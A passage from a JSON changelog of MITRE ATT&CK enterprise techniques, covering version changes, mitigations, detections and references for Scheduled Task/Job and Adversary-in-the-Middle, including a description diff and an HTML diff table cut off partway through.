                        },
                        {
                            "source_name": "Remote Shell Execution in Python",
                            "description": "Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.",
                            "url": "https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python"
                        },
                        {
                            "source_name": "Cisco IOS Software Integrity Assurance - Command History",
                            "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.",
                            "url": "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23"
                        },
                        {
                            "source_name": "Powershell Remote Commands",
                            "description": "Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.",
                            "url": "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "IaaS",
                        "Identity Provider",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.7",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-27 20:03:38.098000+00:00\", \"old_value\": \"2025-10-24 17:48:57.520000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.7\", \"old_value\": \"2.6\"}}, \"iterable_item_added\": {\"root['x_mitre_platforms'][0]\": \"Containers\", \"root['x_mitre_platforms'][8]\": \"SaaS\"}}",
                    "previous_version": "2.6",
                    "version_change": "2.6 \u2192 2.7",
                    "changelog_mitigations": {
                        "shared": [
                            "M1021: Restrict Web-Based Content",
                            "M1026: Privileged Account Management",
                            "M1033: Limit Software Installation",
                            "M1038: Execution Prevention",
                            "M1040: Behavior Prevention on Endpoint",
                            "M1042: Disable or Remove Feature or Program",
                            "M1045: Code Signing",
                            "M1047: Audit",
                            "M1049: Antivirus/Antimalware"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0516: Behavioral Detection of Command and Scripting Interpreter Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:30:46.977000+00:00",
                    "modified": "2026-04-06 13:58:22.807000+00:00",
                    "name": "Scheduled Task/Job",
                    "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "execution"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1053",
                            "external_id": "T1053"
                        },
                        {
                            "source_name": "ProofPoint Serpent",
                            "description": "Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
                        },
                        {
                            "source_name": "TechNet Task Scheduler Security",
                            "description": "Microsoft. (2005, January 21). Task Scheduler and security. Retrieved June 8, 2016.",
                            "url": "https://technet.microsoft.com/en-us/library/cc785125.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Prashant Verma, Paladion",
                        "Leo Loobeek, @leoloobeek",
                        "Travis Smith, Tripwire",
                        "Alain Homewood, Insomnia Security",
                        "Andrew Northern, @ex_raritas",
                        "Bryan Campbell, @bry_campbell",
                        "Zachary Abzug, @ZackDoesML",
                        "Selena Larson, @selenalarson"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_remote_support": false,
                    "x_mitre_version": "2.5",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-06 13:58:22.807000+00:00\", \"old_value\": \"2025-10-24 17:48:38.539000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.5\", \"old_value\": \"2.4\"}}, \"iterable_item_added\": {\"root['x_mitre_platforms'][4]\": \"Network Devices\"}}",
                    "previous_version": "2.4",
                    "version_change": "2.4 \u2192 2.5",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1022: Restrict File and Directory Permissions",
                            "M1026: Privileged Account Management",
                            "M1028: Operating System Configuration",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0094: Cross-Platform Behavioral Detection of Scheduled Task/Job Abuse"
                        ],
                        "new": [],
                        "dropped": []
                    }
                }
            ],
            "other_version_changes": [],
            "patches": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-02-11 19:07:12.114000+00:00",
                    "modified": "2026-04-17 14:18:32.903000+00:00",
                    "name": "Adversary-in-the-Middle",
                    "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1689)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to impair defenses and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "credential-access"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "collection"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1557",
                            "external_id": "T1557"
                        },
                        {
                            "source_name": "dns_changer_trojans",
                            "description": "Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.",
                            "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats"
                        },
                        {
                            "source_name": "volexity_0day_sophos_FW",
                            "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.",
                            "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"
                        },
                        {
                            "source_name": "taxonomy_downgrade_att_tls",
                            "description": "Alashwali, E. S., Rasmussen, K. (2019, January 26). What's in a Downgrade? A Taxonomy of Downgrade Attacks in the TLS Protocol and Application Protocols Using TLS. Retrieved December 7, 2021.",
                            "url": "https://arxiv.org/abs/1809.05681"
                        },
                        {
                            "source_name": "ad_blocker_with_miner",
                            "description": "Kuzmenko, A.. (2021, March 10). Ad blocker with miner included. Retrieved October 28, 2021.",
                            "url": "https://securelist.com/ad-blocker-with-miner-included/101105/"
                        },
                        {
                            "source_name": "Token tactics",
                            "description": "Microsoft Incident Response. (2022, November 16). Token tactics: How to prevent, detect, and respond to cloud token theft. Retrieved December 26, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/"
                        },
                        {
                            "source_name": "mitm_tls_downgrade_att",
                            "description": "praetorian Editorial Team. (2014, August 19). Man-in-the-Middle TLS Protocol Downgrade Attack. Retrieved December 8, 2021.",
                            "url": "https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/"
                        },
                        {
                            "source_name": "Rapid7 MiTM Basics",
                            "description": "Rapid7. (n.d.). Man-in-the-Middle (MITM) Attacks. Retrieved March 2, 2020.",
                            "url": "https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/"
                        },
                        {
                            "source_name": "tlseminar_downgrade_att",
                            "description": "Team Cinnamon. (2017, February 3). Downgrade Attacks. Retrieved December 9, 2021.",
                            "url": "https://tlseminar.github.io/downgrade-attacks/"
                        },
                        {
                            "source_name": "ttint_rat",
                            "description": "Tu, L. Ma, Y. Ye, G. (2020, October 1). Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities. Retrieved October 28, 2021.",
                            "url": "https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Mayuresh Dani, Qualys",
                        "Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project",
                        "NEC"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "2.5",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:18:32.903000+00:00\", \"old_value\": \"2025-10-24 17:48:20.163000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\\n\\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1689)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\\n\\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to impair defenses and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\", \"old_value\": \"Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\\n\\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\\n\\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\\n \\n-For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\\n+For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) and session cookies ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)).(Citation: volexity_0day_sophos_FW)(Citation: Token tactics) [Downgrade Attack](https://attack.mitre.org/techniques/T1689)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)\\n \\n-Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\\n+Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to impair defenses and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "2.5",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to19__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to19__0\"><a href=\"#difflib_chg_to19__top\">t</a></td><td class=\"diff_header\" id=\"from19_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;position&nbsp;themselves&nbsp;between&nbsp;two&nbsp;o</td><td class=\"diff_next\"><a href=\"#difflib_chg_to19__top\">t</a></td><td class=\"diff_header\" id=\"to19_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;position&nbsp;themselves&nbsp;between&nbsp;two&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;more&nbsp;networked&nbsp;devices&nbsp;using&nbsp;an&nbsp;adversary-in-the-middle&nbsp;(A</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;more&nbsp;networked&nbsp;devices&nbsp;using&nbsp;an&nbsp;adversary-in-the-middle&nbsp;(A</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iTM)&nbsp;technique&nbsp;to&nbsp;support&nbsp;follow-on&nbsp;behaviors&nbsp;such&nbsp;as&nbsp;[Netwo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">iTM)&nbsp;technique&nbsp;to&nbsp;support&nbsp;follow-on&nbsp;behaviors&nbsp;such&nbsp;as&nbsp;[Netwo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rk&nbsp;Sniffing](https://attack.mitre.org/techniques/T1040),&nbsp;[Tr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rk&nbsp;Sniffing](https://attack.mitre.org/techniques/T1040),&nbsp;[Tr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ansmitted&nbsp;Data&nbsp;Manipulation](https://attack.mitre.org/techni</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ansmitted&nbsp;Data&nbsp;Manipulation](https://attack.mitre.org/techni</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ques/T1565/002),&nbsp;or&nbsp;replay&nbsp;attacks&nbsp;([Exploitation&nbsp;for&nbsp;Creden</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ques/T1565/002),&nbsp;or&nbsp;replay&nbsp;attacks&nbsp;([Exploitation&nbsp;for&nbsp;Creden</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tial&nbsp;Access](https://attack.mitre.org/techniques/T1212)).&nbsp;By</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tial&nbsp;Access](https://attack.mitre.org/techniques/T1212)).&nbsp;By</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;abusing&nbsp;features&nbsp;of&nbsp;common&nbsp;networking&nbsp;protocols&nbsp;that&nbsp;can&nbsp;de</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;abusing&nbsp;features&nbsp;of&nbsp;common&nbsp;networking&nbsp;protocols&nbsp;that&nbsp;can&nbsp;de</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">termine&nbsp;the&nbsp;flow&nbsp;of&nbsp;network&nbsp;traffic&nbsp;(e.g.&nbsp;ARP,&nbsp;DNS,&nbsp;LLMNR,&nbsp;e</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">termine&nbsp;the&nbsp;flow&nbsp;of&nbsp;network&nbsp;traffic&nbsp;(e.g.&nbsp;ARP,&nbsp;DNS,&nbsp;LLMNR,&nbsp;e</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tc.),&nbsp;adversaries&nbsp;may&nbsp;force&nbsp;a&nbsp;device&nbsp;to&nbsp;communicate&nbsp;through&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tc.),&nbsp;adversaries&nbsp;may&nbsp;force&nbsp;a&nbsp;device&nbsp;to&nbsp;communicate&nbsp;through&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">an&nbsp;adversary&nbsp;controlled&nbsp;system&nbsp;so&nbsp;they&nbsp;can&nbsp;collect&nbsp;informati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">an&nbsp;adversary&nbsp;controlled&nbsp;system&nbsp;so&nbsp;they&nbsp;can&nbsp;collect&nbsp;informati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;or&nbsp;perform&nbsp;additional&nbsp;actions.(Citation:&nbsp;Rapid7&nbsp;MiTM&nbsp;Basi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;or&nbsp;perform&nbsp;additional&nbsp;actions.(Citation:&nbsp;Rapid7&nbsp;MiTM&nbsp;Basi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cs)&nbsp;&nbsp;For&nbsp;example,&nbsp;adversaries&nbsp;may&nbsp;manipulate&nbsp;victim&nbsp;DNS&nbsp;sett</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cs)&nbsp;&nbsp;For&nbsp;example,&nbsp;adversaries&nbsp;may&nbsp;manipulate&nbsp;victim&nbsp;DNS&nbsp;sett</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ings&nbsp;to&nbsp;enable&nbsp;other&nbsp;malicious&nbsp;activities&nbsp;such&nbsp;as&nbsp;preventing</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ings&nbsp;to&nbsp;enable&nbsp;other&nbsp;malicious&nbsp;activities&nbsp;such&nbsp;as&nbsp;preventing</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/redirecting&nbsp;users&nbsp;from&nbsp;accessing&nbsp;legitimate&nbsp;sites&nbsp;and/or&nbsp;pu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/redirecting&nbsp;users&nbsp;from&nbsp;accessing&nbsp;legitimate&nbsp;sites&nbsp;and/or&nbsp;pu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">shing&nbsp;additional&nbsp;malware.(Citation:&nbsp;ttint_rat)(Citation:&nbsp;dns</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">shing&nbsp;additional&nbsp;malware.(Citation:&nbsp;ttint_rat)(Citation:&nbsp;dns</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">_changer_trojans)(Citation:&nbsp;ad_blocker_with_miner)&nbsp;Adversari</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">_changer_trojans)(Citation:&nbsp;ad_blocker_with_miner)&nbsp;Adversari</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;may&nbsp;also&nbsp;manipulate&nbsp;DNS&nbsp;and&nbsp;leverage&nbsp;their&nbsp;position&nbsp;in&nbsp;or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;may&nbsp;also&nbsp;manipulate&nbsp;DNS&nbsp;and&nbsp;leverage&nbsp;their&nbsp;position&nbsp;in&nbsp;or</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">der&nbsp;to&nbsp;intercept&nbsp;user&nbsp;credentials,&nbsp;including&nbsp;access&nbsp;tokens&nbsp;(</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">der&nbsp;to&nbsp;intercept&nbsp;user&nbsp;credentials,&nbsp;including&nbsp;access&nbsp;tokens&nbsp;(</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">[Steal&nbsp;Application&nbsp;Access&nbsp;Token](https://attack.mitre.org/te</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">[Steal&nbsp;Application&nbsp;Access&nbsp;Token](https://attack.mitre.org/te</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">chniques/T1528))&nbsp;and&nbsp;session&nbsp;cookies&nbsp;([Steal&nbsp;Web&nbsp;Session&nbsp;Coo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">chniques/T1528))&nbsp;and&nbsp;session&nbsp;cookies&nbsp;([Steal&nbsp;Web&nbsp;Session&nbsp;Coo</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">kie](https://attack.mitre.org/techniques/T1539)).(Citation:&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">kie](https://attack.mitre.org/techniques/T1539)).(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">volexity_0day_sophos_FW)(Citation:&nbsp;Token&nbsp;tactics)&nbsp;[Downgrade</td><td class=\"diff_next\"></td><td 